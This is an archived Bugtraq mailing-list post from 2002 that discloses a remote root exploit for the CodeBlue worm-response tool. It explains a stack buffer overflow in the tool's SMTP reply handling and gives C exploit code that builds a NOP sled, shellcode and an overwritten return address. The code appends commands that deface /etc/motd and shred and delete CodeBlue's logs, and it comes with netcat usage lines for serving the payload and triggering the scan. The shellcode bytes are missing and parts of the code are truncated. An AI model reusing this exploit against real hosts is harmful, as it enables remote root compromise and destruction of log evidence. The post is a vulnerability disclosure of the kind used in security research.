Home page logo

bugtraq logo Bugtraq mailing list archives

codeblue remote root
From: "Andrew Griffiths" <andrewg () tasmail com>
Date: Fri, 15 Feb 2002 19:34:32 +1100 (EST)

 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 * This is a rather trivial to exploit...
 * From get_smtp_reply()
 * "We'll loop infinately, receiving
 * 1 byte at a time until we receive a carriage return
 * or line-feed character, signifying the end of the output"
 * The stack looks like
 *   int get_smtp_reply(int sd)
 *   {
 *       char response[1024];
 *       char reply_message[1024];  
 *   ...
 * I probably don't have to mention it, but it reads the response into response.
 * ...
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting as running as root?
 *    if ((userid = getuid()) != 0) {
 *       fprintf(stderr, "uid %d is invalid!\n", userid);
 *       fprintf(stderr, "This program MUST be run as root\n");
 *       exit(1);
 *    }
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (one another terminal)
 * printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs. 
 * Granted, nc makes it remote, but why reinvent the wheel? 
 * Oh, and by the way, you'll most likely have to change the offset down there.
 * Lots of improvements could (well, have) be done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reason I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp do to this whenever it
 * recieves a HELO localhost...
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We where given root an a box in a lan, and got to penertrate 
 * several others. Since the person running it was sick of being scanned by 
 * the various worms, he was running this....
 * Now for the paranoia part, how many of those scans have you recieved where
 * to check if you where running CodeBlue?
 * laters,
 * -- Andrew Griffiths

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
/* Standard aleph1 shellcode */

int main()
        unsigned char buf[3000];
        memset(buf, 0, 3000);

        memset(buf, 0x90, 967);
        strncpy(buf+967, sc, strlen(sc));
        fprintf(stderr, "buf: %s\n", buf);
        fprintf(stderr, "strlen(buf): %d\n", strlen(buf));
        buf[1036] = 0xd0;
        buf[1037] = 0xdf;
        buf[1038] = 0xff;
        buf[1039] = 0xbf;
        strcpy(buf + 1040, " id");
        strcpy(buf + 1040, " echo warning codeblue has a remote root hole in it >/etc/motd; shred -z codeblue*log* 
2>/dev/null; rm -f codeblue*log* 2>/dev/null; echo you sux. RTFC...");
        printf("%s", buf);


  By Date           By Thread  

Current thread:
  • codeblue remote root Andrew Griffiths (Feb 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]